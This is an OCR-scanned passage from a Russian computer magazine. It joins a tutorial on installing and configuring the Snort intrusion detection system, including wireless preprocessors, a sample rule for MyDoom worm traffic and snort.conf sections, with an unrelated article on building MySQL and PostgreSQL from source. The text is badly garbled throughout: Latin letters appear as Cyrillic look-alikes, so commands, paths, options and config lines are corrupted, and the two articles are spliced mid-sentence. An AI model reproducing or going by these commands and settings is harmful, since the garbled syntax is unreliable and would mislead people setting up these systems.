ческих опций при установке также задавать 
не надо. Как обычно, указываем интерфейс ’-і’, 
и Зпогі начинает анализ пакетов в режиме гаѵѵ 
топііогіп§ (КЕМСЖ), без привязки к специфи- 
ческой сети, собирая все пакеты, попадающие- 
ся в радиоэфире. Чтобы контролировать только 
свою сеть, необходимо соответствующим 
образом настроить \Уі-Рі устройство или систе- 
му фильтров. Сети ІЕЕЕ 802.11 используют три 
вида пакетов: управления, контроля и данных. 
Чтобы отслеживать первые два типа, необходи- 
мо добавить в строку запуска параметр '-ѵ\Л 
Для более эффективной защиты можно 
использовать орудие нападения — Кізтеі 
ГдлАЛАл^.кізтеішігеІезз.пеС , который умеет 
отлично сканировать эфир, а значит, его можно 
применять для поиска посторонних устройств. 
Анализируя данные с различных точек доступа 
и ѴѴі-Рі карт в связке с Зпогі, можно дать отпор 
даже опытному хакеру. 

Существует специальное ответвление Зпогі 
— Зпоп-ѴѴігеІезз Сзпогі-ѵѵігеІезз.огЕг) . какраз 
предназначенное для обнаружения атак, направ- 
ленных на сети стандарта 802. 1 1 . Зпогі-ѴѴігеІезз 
обратно совместим с Зпогі 2.0, при этом содержит 
некоторые специфические правила обработки 
пакетов, настроенных на уязвимости и типич- 
ные атаки беспроводных сетей. Последние 
обновления датированы ноябрем 2005 года, на 



сайте доступен патч для Зпогі 2.4.3 (требующий 
при компиляции опции '-епаЫе-шігеІезз'), 
также имеется и уже патченая версия Зпогі. 
Функционально Зпогі-ѴѴігеІезз мало отличается 
от Зпогі, дополнительно в его состав включен 
набор правил ѵѵііі . гиіез, содержащий описание 
специфических уязвимостей и ряд препроцес- 
соров. В настоящее время реализовано пять 
препроцессоров: 

1 . АпііЗішпЫег (зрр_апіізіитЫег) — распоз- 
нает рассылку большого количества нулевых 
ЗЗГО с одного МАС-адреса, что используют 
НеіЗішпЫег и МасЗішпЫег для обнаружения 
точек доступа; 

2. ПеаиіЬЕІоосі (зрр_сіеаиі]і_Поосі) — подсчи- 
тывает количество кадров деаутентификации 
и при превышении порога поднимает тревогу; 

3. АиіЬЕІоосІ (зрр_аиі1і_Поосі) — определяет ко- 
личество попыток аутентификации, что может 
свидетельствовать о возможной 003-атаке; 

4 . МасЗрооІ (§рр_тас5роо0 — отслеживает 
попытки подмены МАС-адреса; 

5. Ко^иеАР (зрр_го§ие_ар) — его задача сооб- 
щать о присутствии других точек доступа. 

В Зпогі таких препроцессоров нет, поэтому 
для защиты беспроводной сети имеет смысл 
использовать именно Зпогі-ѴѴігеІезз. 

Установка Бпогі 

На момент написания статьи актуальной была 
версия 2. 6.1. 2. В репозитарии Шипіи, который 
использовался при написании статьи, — 2.3.3. 
Хотелось бы отметить, что подкаталог сопігіЬ, 
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>\л/\ллл/.5погі.огд 



содержащий различные дополнения к Зпогі, 
начиная с версии 2.2.0, пустует. Скрипты для 
создания баз данных переместились в подка- 
талог зсЬетаз, а для создания грт-пакетов 
— в одноименный подкаталог. Остальные же 
расширения можно найти на странице 
ѵ\АЛАл/.5погі.огу/б1/сопігіЪ . Итак, все основное 
сказано, можно начинать установку. 
Распаковываем архив: 

# 5аг -Х 2 ѵі зпог5-2 . 6 . 1 . 2 . 5аг . дг 

Конфигурируем. В самом простом случае 
скрипту не нужно передавать никаких парамет- 
ров. Если же необходимо использовать базу 
данных, то, например, для МуЗС^Ь добавляем 
опцию '“Ѵѵігіі-туздГ. С версии 2.3.0 КС1 в Зпогі 
включен код проекта Зпогі-іпііпе, тем самым он 
получил возможность не только выявлять, но 
и останавливать начавшуюся атаку, перестра- 
ивая правила іріаЫез. И теперь Зпогі является 
полноценной системой предотвращения атак. 
Для включения этого режима добавляем 
'-епаЫе-іпИпе'. 

#./соп5ідиге --ѵ\/і5Іі-тузд1 

# таке 

# таке іпзкаіі 

Настройка Зпогі: 

Не знаю, с чем это связано, но все каталоги, 
необходимые для работы Зпогі, до сих пор 
приходится создавать вручную. Сюда мы 
будем складывать конфигурационные файлы 
и правила: 

# тксііг /екс/зпогк 

А здесь будет вестись журнал работы: 

# тксііг /ѵаг /Іод/ зпогі 

Теперь в каталог /еіс/зпогі копируем все, что 
лежит в подкаталоге еіс дистрибутива: 



# ср -К . /е5с/* /е5с/зпог5/ 

Далее распаковываем файл правил и помещаем 
ихв/еіс/зпогі/гиіез. В принципе, место для 
правил можно выбрать любое, но так удобнее, 
дай считается традиционным: 

# Саг -хгѵі зпог5ги1ез-зпарз1ю5- 

СТЖКЕЫТ . 5аг . дг 

# тѵ гиіез /е5с/зпог5 

Играем по правилам 

Для описания событий, которые могут считать- 
ся злонамеренными или аномальными, исполь- 
зуется гибкий язык правил плюс модульная 
система анализа. Сегодня существует два типа 
правил. Первый тип — официальные серти- 
фицированные и строго протестированные 
Зоигсейге ѴКТ Сегіійесі Киіез, распространяю- 
щиеся по лицензии ѴКТ Сегіійесі Киіез Ілсепзе 
А^геегпепі, ограничивающей их коммерческое 
использование. Эти правила доступны в двух 
вариантах: для зарегистрированных и не заре- 
гистрированных пользователей. Регистрация 
абсолютно бесплатна. Все изменения в первую 
очередь распространяются среди подписчиков 
(зиЪзсгірііоп геіеазе с буквой «з» в названии 
пакета), затем становятся доступными для 
зарегистрированных пользователей (без 
буквы «з») . Те же, кто не зарегистрировался, 
довольствуются статистическими правилами, 
обновляемыми лишь к каждому релизу Зпогі 
и, естественно, отстающими от жизни (они 
имеют префикс «рг» в названии) . Второй тип 
правил называется Соттипііу Киіез. Эти 
правила создаются добровольцами, они еще 
не прошли проверку и распространяются под 
лицензией СРЬ. Для загрузки Сегіійесі Киіез 
необходимо зайти на страницу Эоѵѵпіоасі Киіез, 
выбрать нужное правило и изменить ссылку. 
Например, ссылка на ѴКТ Сегіійесі Киіез 5ог 
Зпогі СІЖКЕЖ выглядит так: алалал/. зпогі. 
огу/риЪ-Ъіп/сІОА/тІоасІз.суі/РоА/тІоасІ/ѵті 
оз/зпогігиІез-зпарзЬоі-СЦККЕНТ.іаг.уг. 



Но, нажав на нее, файл не получишь. Сначала ее 
необходимо привести к такому виду : 
\лАЛАЛА.зпогі.огу/риЬ-Ьіп/оіпктазіег. 
суі/код полученный при регистрации /ѵгі 
оз /зпогігиІез-зпарзЬоі-СЦККЕНТ.іаг. уг . 

Учти, что при ошибке ввода повторная закачка 
будет возможна лишь через 15 минут, также 
нельзя пользоваться некоторыми менеджера- 
ми закачки. 

Давай рассмотрим одно правило, для того 
чтобы было ясно, как они пишутся. Вдруг тебе 
понадобится писать их самому или захочется 
разобраться в том, что конкретно делает то или 
иное правило. Возьмем одно правило из файла 
соттипііу-зтір.гиіе: 

аіегк 5ср ! $8МТР_8ЕКѴЕКЗ апу - 
> апу 25 (тзд : "СОММШІТУ 8МТР 
МукоЬ МАІЬ ЕКОМ А55етр5" ; 

51с т: ез5аЫізЬес1, 5о_зегѵег; 
соп5еп5 : "МАІЬ ЕКОМ | ЗА | посазе; 
роге : " /МАІЬ\ з+ЕКОМ 
\ з* \хЗА\ з* \хЗС? 

(зрт| 5спг I шт I зесиг | аЬизе)@/і" ; 
геіегепсе: игі , ѵіѵт . зутапкес . 
сот/аѵсеп5ег/ѵепс/с1а5а/ѵ\/32 .ту5оЪ@ 
тт.ЬРтІ; сіаззкуре: тізс-а55аск; 
зісі: 100000689; геѵ:1; ) 

Несмотря на довольно серьезный вид, прави- 
лодовольно простое, и если разобрать его по 
частям, то все становится на свои места. Первая 
строка говорит о том, что все сообщения по 
протоколу ТСР, направленные с любого порта 
на порт 25 (то есть почтовый трафик), с опреде- 
ленным адресом в поле отправителя принадле- 
жат вирусу-червю \Ѵ32. МуіоЪ@тт. Нижедан 
комментарий (геіегепсе), позволяющий найти 
более подробную информацию об уязвимости на 
сайте Зутапіес. Некоторые правила занима- 
ют несколько экранов монитора. Директива 
аіегі указывает на действия, которые должен 
производить Зпогі при обнаружении пакета, 
попадающего под это правило. По умолчанию 
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имеется пять действий: аіеіі, 1о§, разз, асйѵаіе 
и сіупатіс. Кроме того, в режиме іпііпе доступны 
еще три: сігор, ге)есі: и зсігор. Правило может быть 
односторонним (V) и двусторонним -^), когда 
направление движения пакета роли не играет. 

Файл конфигурации впогі.соггі 

Последний шаг, который остается сделать, 

— это отредактировать конфигурационный 
файл/еіс/зпогі/зпогі:. сопі. В дистрибутиве 
уже имеется готовый шаблон, поэтому с нуля 
его писать не придется. В файле используют- 
ся переменные, в том числе встречающиеся 
в правилах. Это довольно удобно: при смене 
какого-либо параметра затем не придется 
его переписывать несколько раз. Кроме того, 
некоторые опции вынесены во внешние файлы, 
которые подключаются директивой іпсіисіе 
с именем файла. Все параметры снабжены ком- 
ментариями, начинающимися традиционно со 
знака решетки. Для удобства восприятия файл 
разбит на шесть частей: 

1. установка переменных сети; 

2. указание динамически подгружаемых 
библиотек; 

3. настройка препроцессоров; 

4. настройка вывода информации; 

5. установка дополнительных директив; 

6. модификация правил. 

Примечание: вторая и пятая секции не пред- 
ставляют для нас особого интереса. 
Переменная НОМЕ_ИЕТ определяет ІР-адре- 
са, которые 5 поп будет считать домашними. 
Возможно задание отдельного адреса или 
диапазона. Если требуется указать несколько 
адресов, то они перечисляются через запятую. 
Ключевое слово «апу» означает любой адрес. 
Например: 

ѵаг НОМЕ_ЫЕТ 192 .168.1.0/24 

ѵаг НОМЕ_ЫЕТ [10.1.1.0/24,192.168 

.1.0/24] 

Переменная ЕХТЕІШАБ_]\ГЕТ указывает на 
внешние узлы. По умолчанию стоит апу. 



Можно оставить как есть, а можно указать 
более логично, что все, не являющееся домом, 
будет внешним: 

ѵаг ЕХТЕШАЬ_ЫЕТ ! $НОМЕ_ЫЕТ 

Ниже в файле идет список серверов (Э]\[5, 
5МТР, ѵѵеЪ, зс[1, Геіпеі: и зптр), используемых 
в сети. Можно оставить как есть, то есть 
$НОМЕ_ИЕТ, или указать конкретный ІР-адрес. 
С другой стороны, если у нас нет ѵѵеЪ-сервера, 
то и незачем отслеживать специфические для 
него атаки. Поэтому лишнее можно смело 
отключить. 

Далее задаются номера портов, используемых 
серверами. Это позволяет ЗпоН не распылять 
ресурсы, а искать атаку более конкретно 
(прицельно) . Принцип тот же: если нет Огасіе, 
то соответствующую строку лучше закоммен- 
тировать. Обрати внимание, что номер порта 
может быть задан как единичный (80) и как 
непрерывный (80:8080). Перечисление портов 
через запятую работать не будет (уже не- 
сколько лет обещают исправить этот момент) . 
Поэтому если лл/еЪ-сервер использует два порта, 
то писать необходимо так: 

ѵаг НТТР_РОКТЗ 80 

ѵаг НТТР_РОКТЗ 8080 

Препроцессоры, подключаемые в третьей 
секции «Сопй^иге ргергосеззогз», — штука до- 
вольно серьезная и в хозяйстве, как говорится, 
полезная, но требующая некоторого времени 
для того, чтобы разобраться с назначением 
и особенностями работы. Обрати внимание, 
что некоторые препроцессоры дублируют друг 
друга, поэтому включать все сразу также не 
имеет смысла. Так, вместо РоНзсап и Еіоѵѵ- 
РоНзсап разработчики рекомендуют исполь- 
зовать зІРонзсап, разработанный в Зоигсейге 
и предназначенный для тех же целей, то есть 
для определения сканирования портов. Более 
быстрый в работе модуль Ега§3, используемый 
для дефрагментации ІР-пакетов, пришел на 



смену более старому Ега§2. Кроме того, некото- 
рые препроцессоры направлены на определе- 
ние аномалий в работе определенных сервисов. 
Так, Х-Ііпк28іаі:е предназначен для определения 
уязвимости в Ехсйап^е Зегѵег, а НТТРІпзресі: 
изучает аномалии в Ьнр-трафике. 

Настройка вывода данных 

В четвертой секции «Сопй^иге оЩрЩ ріи^іпз», 
как уже говорилось, настраиваются выходные 
параметры. В общем случае строка параметров 
имеет такой вид: 

оиСриС <паше_о1_р1идіп> : 
<соп1ідигаСіоп_орСіопз> 

В настоящее время ЗпоП может использовать 
10 плагинов для вывода информации (каждый 
из которых имеет дополнительные опции) : 

1 . а1еН_5уз1о§ — для вывода информации 
используется демон зуз1о§; модуль позволяет 
настроить приоритеты сообщений и уровень; 

2. а1ен_1азі: — информация о возможной атаке 
выводится в указанный в качестве допол- 
нительного параметра файл в сокращенном 
формате без подробностей; 

3. а1еН_М1 — модуль, подходящий для неболь- 
ших сетей, так как сильно тормозит работу 
ЗпоН; заголовок пакета выводится полностью; 
в лог-каталоге будет создан подкаталог, по каж- 
дому ІР в который будут записываться пакеты, 
вызвавшие предупреждение; 

4. а1еН_ипіхзоск — схоже предыдущим за ис- 
ключением того, что информация в реальном 
времени передается в Шіх-сокет, откуда может 
быть считана любой другой программой; 

5. 1о§_Щрс1итр — записывает в указанный 
файл перехваченные пакеты в формате утили- 
ты Щрбшпр (к имени файла будет добавляться 
метка времени, поэтому затереть его при 
перезапуске не получится) ; 

6. сІаіаЪазе — модуль, позволяющий заносить 
информацию в базу данных; 

7. сзѵ — вывод в файл формата сзѵ, который 
может быть использован для занесения 
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информации в базу данных. Кроме имени 
файла, необходимо перечислить параметры, 
которые в него заносятся; 

8. ипШеб — выводит данные в специальном 
формате, оптимизированном для обработки 
внешними утилитами, которые затем будут 
заниматься регистрацией события; 

9. а1егі:_рге1ис1е — доступен при конфигуриро- 
вании с опцией епаЫе-ргеІибе', в этом случае 
Зпогі используется как датчик гибридной ЮЗ 
Ргеіибе Гѵ\АЛАл/.рге1ибе-ібз.огу) : 

1 0. 1о§_пи11 — в этом случае ЗпоП способен 
реагировать на указанные предупреждения без 
регистрации пакетов. 

И, наконец, в конце файла ты найдешь шестую 
секцию «Сизіотіге уоиг гиіе зеі», в которой не- 
обходимо убрать комментарии, указывающие 
на файлы с правилами: 

іпсіисіе $КІІЬЕ_РАТН / Іосаі . гиіез 
іпсіисіе $КІІЬЕ_РАТН/Ьасі-1:га^^іс . 
гиіез 

# іпсіисіе $киЬЕ_РАТН/ти11іітес1іа . 
гиіез 

# іпсіисіе $КЕЬЕ_РАТН/р2р. гиіез 
іпсіисіе $КІІЬЕ_РАТН/ехрегітепка1 . 
гиіез 

Названия правил говорят сами за себя. Оставь 
то, что тебе действительно нужно (хотя если 
сомневаешься, лучше включи все) . По умолча- 
нию файл Іосаі.гиіез пуст, в него заносит свои 
правила сам пользователь. 

ЗапускБпогІ 

После того как все будет готово, можно 
запускать Зпогі:. Для работы в режиме 
снифера Зпогі: запускается с флагом ѵ'. 

При этом на экран выводятся заголовки 
пакетов. Если же есть желание просмотреть 
и передаваемую информацию, используй 
следующую команду: 



# зпогк -ѵсі 

Если в системе один интерфейс, то программа 
сама разберется, с чем ей работать. В против- 
ном случае его требуется указать с помощью 1: 

# зпогк -ѵсі -і еккО 

Можно указать на конкретную информацию, 
которую требуется захватить. Например, 
устанавливаем в качестве домашней сети 
192.168.1.0 и захватываем пакеты с узла 
192.168.1.1: 

# зпогк -Ь 192.168.1.0/24 -с! -ѵ 
козк 192.168.1.1 

Для регистрации пакетов в общем случае 
указываем каталог, куда следует записывать 
информацию: 

# зпогк -1 . /Іод 

Если на выходе требуется файл в формате 
ісрбитр, то добавляем параметр '-Ъ'. 

И, наконец, работа в режиме системы обнару- 
жения атак. Так как файл зпогксопіуже создан, 
то поступаем просто: 

# зпогк -с /екс/ зпогк /зпогк . сопі 

Для тестирования набираем «ріп§ -з 65507 
ір_адрес». После чего, если выбран соответс- 
твующий режим ведения журнала, в катало- 
ге /ѵаг/іо^/зпогі: появится файл с предупреж- 
дением о потенциально опасном пакете: 

[**] [1:499:3] ІСМР Ьагде ІСМР 
Раскек [**] 

[Сіаззікісакіоп : Рокепкіаііу Вас! 
Тгаккіс] [Ргіогіку: 2] 

15/11-18:21:2. 1131991802 192 . 168 . 0 
. . .1 -> 192.168.0.2 0 



ІСМР ТТЬ : 255 ТОЗ : 0x0 ІБ:18479 

ІрЬеп:20 БдтЬеп: 63028 

Туре: 0 Сосіе : 0 ІБ:512 Зед: 19456 ЕСНО 

ВЕРБУ 

[Хгек => агаскпісіз 246] 

При всестороннем тестировании работы Зпогі: 
следует использовать специальные утилиты 
вроде ГОЗѵѵакеир Сілллпѵ.Ьзс.Іг/геззоигсез/ 
оигііз /Мзѵѵакеир /боѵтІоасО . 

Для автоматического запуска Зпогі: при загрузке 
системы необходимо использовать скрипт 
зпогісі, который лежит в подкаталоге грт 
дистрибутива. Копируем его в/еіс/гс. б/іпіі:. 
сі и даем команду: 

# сйксопіід зпогксі оп 

Анализаторы файлов и веб-морды 

Зпогі: создан для того, чтобы выполнять одну 
задачу — определение атак, и выполняет он 
ее хорошо. Анализ файлов журналов отдан на 
откуп сторонних разработчиков. Некоторые 
утилиты, предназначенные для этих целей, ты 
найдешь на сайте проекта. Например, с помо- 
щью Регі-скрипта 5попАЬо§ О'егету.сЬагйег. 
(гееіг/зпогі:а1о§) можно отобрать необходи- 
мую информацию и вывести ее в удобном для 
чтения виде. Вот так можно вывести топ атак, 
сгруппированных по времени, и отослать его 
по почте: 

# сак /ѵаг / Іод/ зпогк / зпогк . 

Іод . 1164559498 I . /зпогкаіод.рі 
-1юиг_аккаск | /изг/зЪіп/зет!таі1 
-1 ас!тіп@с1отаіп . сот 

Также имеется несколько веб-интерфейсов, поз- 
воляющих проанализировать собранную ин- 
формацию: АСЮ (Апаіузіз Сопзоіе іог Іпітизіоп 
ПаіаЪазез, асісіІаЬ.зІ.пеі:) , ВАЗЕ (Вазіс Апаіузіз 
апб Зесигііу Еп§іпе, Ьазе.зесигеШеаз.пеП . 
ЗпогіСоп (зпогШоп.зЕпеП . I НИ 
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СРАВНИТЕЛЬНОЕ ОПИСАНИЕ ПРОЦЕССА УСТАНОВКИ И НАСТРОИКИ ДВУХ ПОПУЛЯРНЫХ СУБД 

В мире^вободных программ тайлов ело&^мы говорим «база данных» — подразумеваем мускуйь». А чем 
нам, спрашивается, не угодила Ро?Е§ге-&ОЬ^^открь1тая (даже более открытая, чемМуЗСЗЬ), свободная, с мощ- 
нейшей функциональностью? Кто-то скажет — сложная; кто-то — тяжелая; кто-то — что тормозит. Но всег- 
да ли высокая скорость — самое главное? И правда ли то, что поставить ее сложней," чем совладать 
с «дельфинчиком»? Вот в этом мы и попытаемся сегодня разобраться. . . 



Инсталляция 

Для чистоты эксперимента обе СУБД ставить 
будем из исходников. Если приложение есть 
в менеджере пакетов твоей системы (мне 
пока еще не попадались такие, где не было 
бы МуЗС^Е или Розі^геЗС^Б), то лучше ус- 
танавливать оттуда. Таки с обновлением 
меньше проблем, и отслеживать зависимости 
проще — а то попробуй потом какому-нибудь 
КоипДСиЬе докажи, что СУБД у тебя уже 
есть. Но поскольку «официальная» инсталля- 
ция никаких проблем вызвать не должна (ско- 
мандовать «арйшбе іпзіаіі ту5^1-5е^ѵе^-5.0» или 
«ро^гіп5Ш11р051:8^е§^1-5е^ѵе^» особого труда 
не составит), то мы пойдем по пути наибольше- 
го сопротивления. 

Итак, разжившись архивами с исходным 
кодом свежих версий (сразу бросается 
в глаза соотношение их размеров — 24 Мб 
МуЗС^Б 5.0.27 против ІОМбРозі^геЗС^Б 
8.2.0; а еще говорят, что постгрес 
тяжелый), потратим несколько минут на изуче- 
ние опций конфигурации, чтобы не было потом 
мучительно больно. . . Как обычно, полный спи- 
сок доступных опций можно просмотреть, вве- 
дя в полученном после распаковки тарбола 
каталоге следующую команду: 

$ . /сопЕідиге --Ь.е1р 

В случае с МуЗС^Б первое, на что следует об- 
ратить внимание, — это кодировка, которую 
СУБД будет использовать по умолчанию. 



Поскольку Іагіпі нас вряд ли устроит, нужно 
будет указать опцию '--м/цЬ-сЬагзеР в соответс- 
твии с твоей кодировкой (скорее всего, это бу- 
дет коі8г, ср 1251 или щШ). Если ты планируешь 
работать в дальнейшем с несколькими кодовы- 
ми страницами, то дополнительные кодировки 
укажи в опции '--ѵѵйіі-ехіта-сііагзеіз'. Чтобы 
себя ни в чем не ограничивать, можешь задать 
сразу '--ѵѵпіі-ехіта-сііагзеіз = аІГ . 

Вторая вещь, не совсем привычная для 
пользователей, работавших ранее с дру- 
гими СУБД, — возможность выбрать тип 
таблиц. МуЗС^Б поддерживает целую ве- 
реницу различных движков на все случаи 
жизни: ВЭВ, ІппоЭВ, МуІЗАМ, НЕАР... Первые 
два — Вегкеіеу ЭВ (разработчик — Зіеерусаі 
Зойм/аге, ныне принадлежащий Огасіе) 
и ІппоЭВ (опять-таки купленный Огасіе) — яв- 
ляются транзакционными. Это обеспечивает 
высокую надежность работы с данными (БД 
не потеряет согласованность в случае воз- 
никновения программного или аппаратного 
сбоя, и существует возможность восстановить 
или откатить незавершенные операции) и поз- 
воляет объединять логически связанные из- 
менения в БД в атомарные (транзакционные) 
блоки, фиксирующиеся в базе по принципу 
«все или ничего». Таблицы МуІЗАМ не поддер- 
живают транзакции, что обеспечивает им 
более высокую скорость работы, но меньшую 
надежность. Таблицы НЕАР размещаются 
в оперативной памяти, благодаря чему работа- 
ют очень быстро, но, естественно, не 



сохраняют данные при сбоях. С учетом ряда 
других ограничений НЕАР-таблицы удобно 
использовать для временных данных, но для 
«нормальной» работы они мало пригодны. 

Если ты точно знаешь, какой тип таблиц тебе 
нужен, то можно при сборке СУБД указать толь- 
ко их. Обычно в таких случаях рекомендуют 
использовать МуІЗАМ там, где ради скорости 
можно пожертвовать всеми данными, и ІппоЭВ 
для остальных задач. 

Перейдем к Роз^геЗС^Е. С языками здесь чуть про- 
ще — эта СУБД не будет напрягать тебя по поводу 
дефолтных кодировок и т.д. Единственное, что 
можно сделать, — это указать в '-епаЫе-пІз' 
перечень языков, на которых система будет 
с тобой общаться. 

А вот над чем можно задуматься, так это над 
списком языков программирования. Их можно 
использовать для разработки триггеров, храни- 
мых процедур и прочих прелестей. Розі^геЗС^Б 
поддерживает несколько языков на твой выбор 
— «из коробки» можно включить поддержку 
РЕ/Тсі, РБ/Регіи РБ/РутЬоп, вдогонку к стан- 
дартному РЕ/р§5(2Б; также поддерживаются 
РНР и Іаѵа. 

Опции '-ллшЬ-кгЪБ', '--лл/пЬ-рат' и '--лл/пЬ-Ыар' 
позволяют включить поддержку дополни- 
тельных способов авторизации, что может 
быть очень полезно для работы в локальной 
сети, когда требуется обеспечить предельную 
гибкость и прозрачность при работе пользова- 
телей с базой. Также подумай сразу, нужна ли 
тебе поддержка безопасных соединений 
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> рдАсітіп: до РІ_/5СІІ_ Оеѵеіорег от Огасіе пока явно 
недотягивает, но работать приятно 




> іпіісіЬ: должно быть все ОК 



('--лл/йЬ-орепззГ) и протокола автоматической настройки 
сети Воп)'оиг ('--м/Пй-Ъофоиг') . 

По большому счету, параметры, предлагаемые по умолчанию, 
достаточно хороши, и если ты ставишь себе СУБД «общего 
назначения», то вполне можешь ничего не менять. Только 
для МуЗС^Б лучше бы не забыть указать кодировку, чтобы 
потом не удивляться, что как-то криво работает сортировка 
по отечественному алфавиту. 

Итак, после того как ты наметил для себя, с какими пара- 
метрами следует собирать приложения, сборка и инсталля- 
ция традиционны и просты: 

$ зисіо асісідгоир шузді 
$ зисіо асМизег -д шузді шузді 
$ . /сопіідиге --рге1іх=/изг/1оса1/шузд1 -- 
ѵ\/і Б Ъ . - сБаг з е Б =и Б 1 8 
$ таке 

$ зисіо таке іпзБаІІ 

Возможно, придется самую малость повозиться с за- 
висимостями (раз уж мы пошли по пути сборки из 
исходников, то избежать этого трудно) . Например, пот- 
ребуется библиотека сигзез (илипсигзез), причем нужны 
будут и заголовочные файлы, которые обычно вынесены 
в отдельный беѵ-пакет и по умолчанию редко 
устанавл ив аются . 

ДЛЯ РО5Т0КЕ5СІІ-: 

$ зисіо асМизег розкдгез 

$ . /сопіідиге --рге1іх=/изг/1оса1/рдзд1 -- 
мШБ-руСБоп --отіББ-регІ 
$ таке 

$ зисіо таке іпзкаіі 

Здесь из зависимостей могут встретиться библиотеки 
геасШпе и 2 ІіЬ (тоже с беѵ-пакетами) . Если Розі^геЗС^Б соби- 
рается с поддержкой процедурных языков РБ/Регі 
и РБ/РуШоп (как в примере), то понадобятся также беѵ- 
пакеты для БіЪрегІ и РуіШоп. Для других 
опций, естественно, будут выплывать свои 
зависимости. Главное — не забудь создать нужных для 
работы пользователей и группы. 

С установкой на этом все, переходим к настройкам. 



Инициализациям настройка 

Итак, установка позади. Прежде чем приступать к 
работе, нужно выполнить инициализацию баз, а так- 
же сверить настройки по умолчанию со своими 
желаниями. По традиции, начнем с МуЗС^Б. 

Для инициализации базы разработчики подготовили 
специальный скрипт тузд1_іпзі:а11_с1Ь, который можно 
найти в каталоге Ьіп. Запускать его следует с правами 
гооБ чтобы он мог создать необходимые каталоги, но же- 
лательно сразу указать параметр '-изег', чтобы задать 
пользователя, который станет владельцем созданного 
каталога. Можно, конечно, потом поменять права 
и вручную, но лучше сразу: 

$ зисіо . /тузд1_іпзБа11_с1Ъ --изег=тузд1 -- 

сіакасііг=/ѵаг/сіЬ/тузд1 

В конце работы этого сценария на экран будут выведены 
инструкции по дальнейшим действиям. В частности, нуж- 
но будет задать пароль пользователю гооі (не путай его с 
системным рутом) : 

$ /изг/1оса1/тузд1/Ып/тузд1асітіп -и гооБ 

раззчлгогсі ' заЬиЬпкктузд' 

Кстати, почитай документацию к туздіабтіп — это очень 
мощная утилита для администрирования СУБД. БазаЩзИ, 
с которой будем экспериментировать, создастся ав- 
томатически на этапе инициализации. Рабочие базы 
можно создать либо из клиента шузді командой СКЕАТЕ 
ПАТАВАЗЕ, либо с помощью той же туздіасітіп. При необ- 
ходимости создай пользователя (СКЕАТЕ ИЗЕК), и можно 
работать. 

Но прежде чем запускать сервер, желательно 
сначала создать конфигурационный файл (по умол- 
чанию /еіс/ту.спО . Разработчики любезно заго- 
товили несколько шаблонов конфигурации для 
различных случаев, смотри каталог зирроП-Шез 
в исходниках. Шаблоны ту-іаг^е.спі, ту-тебіит.спі 
и ту-зтаП.сп! отличаются по большей части 
значениями, заданными для различных влияющих на 
потребление памяти переменных (буферов, кэшей 
и т.д.). Если интересно, можно выполнить 




> Вечный спор «МуЗОБ 
ѵз РовідгеЗОБ» можно 
найти практически 
на любом «админс- 
ком» сайте. Главное 
— не доверяй слепо 
первым попавшимся 
аргументам. 




> ѵѵѵѵѵѵ.ту5д[.сот 

— сайт компании 
МуЗОБАВ; 
ѵѵѵѵѵѵ.тувдБогд 

— почти то же 
самое, но ориентиро- 
ванное на 
сообщество; 
ѵѵѵѵѵѵ.ровІдгевдБогд 

— официальный сайт 
СУБД РозфгеЗОБ; 
ѵѵѵѵѵѵ.тѵвдБги — рус- 
скоязычный сайт 
почитателей МуЗОБ; 
ѵѵѵѵѵѵ.ровІдгевдБги 

— страница русско- 
язычной документа- 
ции по РозІдгеЗОБ. 
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Графические инструменты для работы с СУБД 

ИМУЗОІ, И РОЗТОКЕЗдЬНЕ ОБДЕЛЕНЫ СРЕДСТВАМИ ДЛЯ БОЛЕЕ КОМФОРТНОЙ РАБОТЫ С СУБД. ПРЕЖДЕ ВСЕГО, СЛЕДУЕТ ОТМЕТИТЬ 
ВЕЗДЕСУЩИЙ РНР-ИНСТРУМЕНТАРИЙ: РНРРОАОМІИ И РНРМУАЭМШ. ТАКЖЕ ДЛЯ РОЗТСКЕЗСЗБ НУЖНО ВЫДЕЛИТЬ УТИЛИТУ РСАИМІИ 
— ПРОСТОЙ, НО В ТО ЖЕ ВРЕМЯ ДОСТАТОЧНО УДОБНЫЙ СПОСОБ АДМИНИСТРИРОВАТЬ БАЗУ. 



«сШТ-и ту-1аг§е.спГту-5та11.спЬ>. Для не- 
большой домашней машины вполне 
подойдет шаблон ту-зтаП.спГ, который 
следует скопировать в /еі:с под именем 
ту.спГ Для более крупных инсталляций 
лучше просмотреть самому один из вы- 
бранных шаблонов и подогнать параметры 
под оптимальные значения в зависимости 
от объема имеющейся в наличии памяти. 
Если ты планируешь использовать таблицы 
типа ІппоИВ, то ту.спГ нужно будет обяза- 
тельно подредактировать — по умолчанию 
все, что касается этих таблиц, в нем 
закомментировано. 

Отыщи в конфигурационном файле в сек- 
ции [туздіб] следующие строки, сними 
комментарии и приведи в соответствие со 
своими потребностями: 

# Путь к каталогу, где будут разме- 
щены ІппоБВ- таблицы : 
іппобЪ_бака_Ьоте_біг = / ѵаг /6Ъ/ 
тузді /іппобЪ/бЪ/ 

# Имя файла хранилища, его первона- 
чальный размер (10 Мб) 

# и разрешение на автоматическое 
расширение при необходимости: 
іппобЪ_бака_кі1е_ракЬ. = 
іббакаі : 10М: аикоехкепб 

# Каталог хранения журналов и 
архивов 

# (если есть возможность, лучше 
выносить на отдельный винт) : 
іппобЪ_1од_дгоир_1юте_біг = /ѵаг/ 
бЪ/туздІ/іппобЪ/Іод/ 
іппобЪ_1од_агсЬ_біг = /ѵаг/сПэ/ 
тузді /іппобЪ/Іод/ 

# Память, отводимая под буферы 
(если на машине работает что-то, 

# кроме тузді , лучше не поднимать 
выше 3 0-70% от объема ОЗУ) : 
іппосіЬ_ЬиГГег_роо1_зІ2е = 16М 
іппобЪ_аббік іопа1_шеш_роо1_з і 2 е 
= 2М 

# Размеры журнальных файлов (реко- 
мендуется держать на уровне 

# 20-25% от размера буферов) : 
іппосіЬ_1од_Гі1е_зІ2е = 5М 
іппосіЬ_1од_ЬиГГег_зІ2е = 8М 
іппобЪ_к1изЬ_1од_ак_кгх_соттік = 1 
іппобЪ_1оск_ѵ7аік_кітеоик = 50 



Приведенные цифры, естественно, можно 
менять в зависимости от конкретной ситуа- 
ции — от ресурсопотребления других 
процессов, работающих на этой же 
машине, объема памяти и т.д. Каталоги, ука- 
занные в конфигурации, должны существо- 
вать (в том смысле, что их придется создать 
вручную до того, как сервер будет перезапу- 
щен с новыми параметрами) и принадлежать 
пользователю тузді: 

$ зибо -и тузді ткбіг -р /ѵаг/сПэ/ 
тузді /іппобЪ/ {6Ъ, Іод} 

В опции іппобЪ_баі:а_Ше_раі:1і можно указы- 
вать несколько файлов. При первом запуске 
сервера после внесения изменений в конфи- 
гурацию будет выполнена инициализация 
указанных хранилищ: 

